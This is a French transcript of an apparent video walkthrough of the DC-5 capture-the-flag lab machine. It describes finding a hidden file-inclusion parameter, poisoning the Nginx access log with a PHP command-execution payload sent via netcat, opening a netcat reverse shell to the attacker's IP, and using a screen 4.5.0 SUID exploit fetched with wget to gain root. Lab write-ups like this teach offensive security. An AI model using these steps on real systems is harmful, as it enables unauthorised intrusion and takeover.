Alors bonjour, bienvenue sur Daisy. Ici, c'est que vous êtes sur une vidéo qui va traiter la machine DC5, mais cette fois-ci on est en mode speedrun. Il y a deux vidéos sur la chaîne, il y a une où vraiment j'explore la machine. La vidéo fait je crois 3 heures, enfin elle est un peu longue, donc ça montre un peu mes méthodes de recherche, etc. C'est pas mal. Mais pour ceux qui voudraient juste la réponse à DC5, là on va y aller vraiment en mode straightforward, on va y aller direct. Donc j'ai déjà mis les IP qui vont bien, donc là on lance le scan. Bon, je suis déjà sur le site parce que je sais qu'il y a du 80 derrière, et on verra après pour les autres outils. Donc voilà, on part direct, ça scanne. On a 3 ports, on a 80, le 111 et 34262. Donc le 111 c'est du RPS. En fait, là pour cette machine, il n'y a que le port 80 qui va nous intéresser et rien de plus. Donc on va directement sur le port 80, on peut voir ici. Alors avant de dire, on peut voir ici. Ouais, voilà. On peut lire sur la machine. Où est-ce que c'était écrit? Je crois que c'était écrit là. Ah voilà. Non, ah voilà. Aux anges du conscient, il n'y a qu'un seul point d'entrée qui est exploitable, il n'y a pas de SSH, là. Il va falloir chercher un truc qui sort un peu de l'ordinaire, quelque chose qui change quand on rafraîchit une page. Ça devrait vous donner une idée pour trouver le type de vulnérabilité. Et donc bah c'était le point où j'avais coincé. Enfin j'avais vu. Donc du coup on en est sur un site. Là voilà on a beaucoup de choses. Et donc en fait ce qui va changer c'est là quand je vais entrer la page de contact. Alors là ça n'a pas changé, mais on voit qu'il est écrit ici copyright 2019. Et si je rafraîchis juste cette page en particulier, je vois que le copyright change. Donc ça par chance je l'avais vu la première fois que j'avais envoyé le formulaire de contact, j'avais vu que le copyright avait changé. Mais on peut passer à côté parce qu'au 2019, qui est le copyright par défaut, revient. Alors là, si je recharge la page, ça change pas. Par contre, si je vais du coup sur la page Thank you, voilà. Alors ensuite, j'avais trouvé un moyen de savoir qu'il y avait... Alors non, j'ai tellement enseigné parce que du coup, si la vidéo fait 3 heures, ce qui est une raison que vraiment je peinais, je comprenais pas où était le truc. Et en fait, du coup, on a appris une nouvelle technique, c'était apprendre à reconnaître les nouveaux, s'il y a, oui ou non, des paramètres intéressants qui ne seraient pas donnés. Donc là, on peut voir que j'ai une série de paramètres. Donc comment j'ai fait ça? Bah c'est simple. On va se faire un petit fichier en faux dictionnaire. Hein, voilà. Dedans, je vais faire test, file, admin, voilà. Et donc... Voilà, on va faiser. J'essaie de retrouver DC5 pour la peine. DC9. Ah, il y avait DC7. Ah non, il y a DC5, mais je m'étais foiré. DC7, DC5, voilà. Donc, on va faire appel à wfuzz, pardon, sur notre dictionnaire. On s'en fout pour le moment. Et donc là, on remet bien toute l'URL qu'on a ici. Mais on rajoute un petit fuzz à la fin. Et donc on teste avec notre dictionnaire. Et on peut voir que file, il est différent de admin et test qui retournent les mêmes choses, c'est-à-dire un code 200, c'est ok. 42 lignes, bon ça ok. Mais on peut voir qu'il y a moins de caractères quand il y a file qui est écrit, qui est utilisé comme paramètre. Donc en gros quand j'ai cette requête, quand j'ai la requête là comme ça, voilà, quand je fais cette requête, j'ai moins de caractères qui s'affichent. Alors on va tester, donc là je fais et file égale, on peut voir qu'effectivement le copyright disparaît, là il n'apparaît plus. Et en fait avec ce paramètre file, du coup on peut aller chercher des fichiers. Donc là on peut voir par exemple le fichier etc password. Donc ce qu'on va faire, c'est lancer un petit burp suite pour pouvoir avoir un meilleur affichage. Non, pas faire suite. Moins de 5 minutes et j'en suis déjà là. La première vidéo, j'en étais à 1 heure et quelques avant d'arriver enfin à cet endroit. C'était incroyable. Donc je crois que je vais faire ça pour les longues vidéos. Quand je vois qu'elles sont super longues, je ferai des vidéos straightforward, voilà, ultra rapides. Pour arriver, pour montrer vraiment le truc. Bon, je trouve pas très intéressant, mais je comprends que voir 3 heures de vidéo, ça peut être aussi très chiant. Donc bon. Mon proxy, on va faire intercept zone. Donc là, on va recharger. On reçoit la requête ici. Donc on va faire send to repeater, voilà.
Et donc là, quand je mets des fichiers, voilà, là ils m'apparaissent en plus de façon un peu plus jolie que sur Firefox. On peut vraiment voir le fichier tel qu'il est formaté. Et donc, avec de la recherche, c'était quoi déjà? Ah oui, il fallait savoir qu'on était sur Nginx et que l'on peut faire ce qu'on appelle du log poisoning. Alors ça, j'ai découvert avec la recherche internet. Et donc, slash Nginx. Non, Nginx, je peux écrire. Nginx.log. Je crois qu'on devrait voir les logs comme ça. Si c'est pas ça, c'est peut-être access ou request.log, je sais plus. Non, voilà, c'est access.log. Et donc là, on a tous les accès. Bah, faut savoir qu'en fait, tout ce qui est ici, en fait, va être interprété. Donc, si je mets du code PHP, dans la page, dans la requête de réponse, il va être interprété comme étant du code. Donc, pour ça, on va faire ce qu'on appelle du log poisoning. Alors là, je vais pas l'inventer, on va retourner sur le site. C'est un truc genre part one, je sais plus. Ah oui, du coup. Ah voilà, c'était celui-là. From local inclusion file. From local file inclusion, pardon, to remote code execution part one. Donc en gros, voilà, là il peut voir que quand il met, quand il fait une requête, ah oui, c'était ça, faut faire une requête. Quand il fait une requête avec netcat et qu'il écrit ça en requête, bah du coup il y aura le get avec du code PHP derrière. Donc ce code sera exécuté et on peut voir que quand il va voir les logs, le access log de, bon là de Apache, mais ça va fonctionner avec Nginx, on peut voir que la requête PHP info est exécutée. Donc du coup, ce qu'on va faire, c'est une requête avec netcat sur le site, et on va faire cette requête get system get cmd. Ça va donc exécuter. En fait, le get cmd va créer un nouveau paramètre cmd. On a le file, maintenant on va créer un nouveau paramètre cmd dans la requête PHP. Et cette requête, cette commande va être exécutée par la fonction système de PHP. Donc on va pouvoir exécuter du shell sur Linux. Donc, pour ça il me faut un shell. Donc c'est ncdc5 sur le port 80. Là je fais get slash php système, lui arriver système tac $_ cmd et je ferme la parenthèse et après c'était quoi? Ouais, tac tac. Donc là je vais effectuer cette requête sur la machine DC5. Ah, il me dit que c'est pas trouvé. Mais maintenant dans les logs il y a ce code. Donc quand je vais exécuter du code, si là je fais donc file si dans les files je vais voir le access.log, voilà, et que je dis cmd égale, on va dire pwd.virgule ls-alh, ça je l'envoie ailleurs, hop, voilà, j'exécute la requête. Je sais pas si on va le voir quelque part. Ah si, voilà. On peut donc voir ici mon pwd, donc là où je me trouve, c'est dans /var/w/html, et voici les fichiers où je me trouve. Donc c'est bon, on peut exécuter du code, ça y est. Donc, à partir de là, étant donné qu'on peut exécuter du code, on va donc exécuter la commande shell suivante. On va donc faire un petit appel à netcat, donc c'est dans bin nc, enfin c'est le bin /bin /clc. Sur mon adresse IP. J'ai plus mon adresse IP. Voilà, 192.168 1.20, donc là c'est mon adresse IP de Kali. Voilà. Ok. Sur un port quelconque, moi j'ai mis 9999, et on va exécuter /bin/bash. Ici, je vais donc faire un listener de netcat sur le port 999. Donc là, j'exécute la requête. Et j'ai mal de faire un truc parce que j'ai pas reçu de 999, bon, d'accord, j'ai rien reçu. Ah oui, et forcément. Ok, on réexécute. Voilà.
Ah oui, du coup, il me réexécute mes anciennes... Ok. Donc là, c'est bon. Donc là, j'ai reçu la requête ici de la commande CMD. Et donc, qu'est-ce que j'avais fait? Oui, j'avais fait une recherche de SUID de mémoire. Donc les fiches SUID, c'est des fichiers qu'on peut exécuter avec certains droits d'accès, dont route. C'est-à-dire que quand on exécute, on a des droits de route, mais encore faut-il après pouvoir réussir à trouver un moyen de détourner l'exécutable pour avoir accès à un shell. Donc, voilà, on peut voir dans les réponses, on a screen-4.5.0. Donc, on va faire un petit coup de searchploit. Voilà, sur du screen 4.5.0. 5.0, merci. Et là, on peut voir, oh là là, screen 4.5.0, on peut faire le calculage escalation. Oh. Donc pour ça, on va aller DC5. Non, c'est ici. On va copier le script en question. Voilà, et on va voir ce qu'il fait. Donc le script, là, on peut voir qu'il va nous faire de la compilation. Le problème, c'est que sur la machine distante, voilà, GCC existe. Mais CC existe aussi, mais il n'y a pas CC1. Et CC1, c'est le vrai compilateur de Linux. C'est-à-dire que GCC, CC, en gros, c'est des wrappers. CC1, c'est vraiment le compilo qui va transformer le source en assembleur objet. Enfin, voilà. Donc, il nous manque cet outil. Donc, ce que j'avais fait moi, c'est que j'avais compilé l'outil sur la Kali, sauf que la libc de Kali est trop récente par rapport à celle de la machine. Donc, la machine, elle est obsolète en termes de version. Donc, ce que j'ai fait, c'est que j'ai un Ubuntu 12.4.0, 12.04, on va voir. C'est ETC, voilà, 12.04, voilà, donc j'ai ce GCC là. Et donc, ce que j'ai fait, c'est que j'ai, à l'aide, j'ai donc hébergé un serveur sur ma Kali Linux. Donc, je suis en 1.20, c'est ça. Oui, c'est 1.20. Et donc, je l'ai récupéré ici, donc wget 192.168.1.20 slash. Par contre, j'ai plus le nom du script. Hop, hop. Donc, je suis bien en 1.20, oui, et c'est 41.154. 41.154.sh. Voilà. Ah, je l'ai pas mis en... Ok, je suis sur le mauvais réseau. Alors, attendez, vous allez voir. Je shutdown le Linux. Voilà, on shutdownise. Ouais, attendez de shutdowner. Étendre la machine pour de bon. Voilà. Merci. Je vais dans sa configuration réseau et j'imagine, voilà, j'étais en réseau privé haute, je veux un accès par pont. Ok, on redémarre le Linux, enfin le Ubuntu. En live. Ouais, j'ai oublié. Oui, j'étais pas sur le bon réseau. Voilà, donc l'Ubuntu démarre. Hein? L'Ubuntu nous embête. Alors je me pose dans la vidéo, hein, et je reviens quand j'aurai réussi à démarrer Ubuntu. Cette phrase, mon Dieu. Donc voilà, donc j'ai réussi à démarrer. Normalement, si je démarrais le serveur web. Ah d'accord. Ah d'accord. Alors attendez, hein. Donc je disais Ubuntu, voilà, qui télécharge le script shell.
on le rend exécutable. On l'exécute. Bon, là, ça marche pas sur Ubuntu parce qu'on n'a pas le programme screen à la bonne version. Mais si je vais voir dans le répertoire TMP, j'ai libax.so et root shell. En gros, le fichier, le script shell va voilà, créer un fichier libax.c pour le compiler en bibliothèque partagée, donc en .so. Il va ensuite faire pareil que root shell, qui va juste là le compiler en un programme. Et en fait, voilà, il va utiliser les commandes qui sont ici. Alors du coup, on est obligé de faire ça de façon séparée, pardon. Donc, on va maintenant sur Ubuntu héberger un serveur web Python, pareil, parce que là, on a du Python 2. Donc, c'est simple http serveur sur le port 80. 80, pardon. Quoique non, je préfère du sudo, en fait. Voilà. Donc, je vous montre. On a nos deux fichiers libax.so et root shell, et on héberge un serveur web dans /tmp. Donc si on fait notre IP sur le port 8080, du coup je peux faire sur le port 80. Voilà. Donc sur le port 80, je trouverai les deux fichiers ici. Donc, ce qu'on fait depuis le shell qu'on a ici, on va aller dans le répertoire TMP. On va wget, alors ça c'est sur l'IP d'Ubuntu, je crois que c'est 1.26 de mémoire, 192.168.1.26/libax.so. Il m'a rien écrit, c'est ça? Non. Recommençons. Il m'a tout écrit dans Linux, dans l'Ubuntu. 168.1.26/libax.so. Ok, donc j'ai reçu une requête sur Linux, je vous montre. Hop, comme quoi ça a bien été téléchargé. Voilà. Enfin, sur Linux, sur Ubuntu, pardon. Et on va faire pareil, wget 192.168.1.26/root shell. Je crois que c'est ça, root shell. Ouais, root shell. Voilà, ça a bien été téléchargé aussi. Et donc là, ce qu'on va faire, c'est... on va exécuter les commandes shell qu'il doit exécuter dans le shell, mais une par une. Donc tout ce qui est lié à la compilation, c'est fait. On commence à la ligne 36. Donc c'est les quelques dernières lignes. On va faire un cd etc. Voilà. umask 0. On exécute tout ça. Voilà. On va screen-ls. On exécute le root shell. Et nous sommes devenus root. Et donc, maintenant que nous sommes root, nous pouvons aller dans /root, lister et this is the flag.txt. Et voilà. On vient de faire DC5 mon logiciel de capture en moins de 20 minutes. Voilà. Donc c'est plutôt rapide. Et ben je vais faire ça pour toutes les machines qui étaient un peu longues. Je crois que c'est toutes les DC, hein, comme ça va être vite fait. Je vous dis donc, eh bien, à la prochaine vidéo.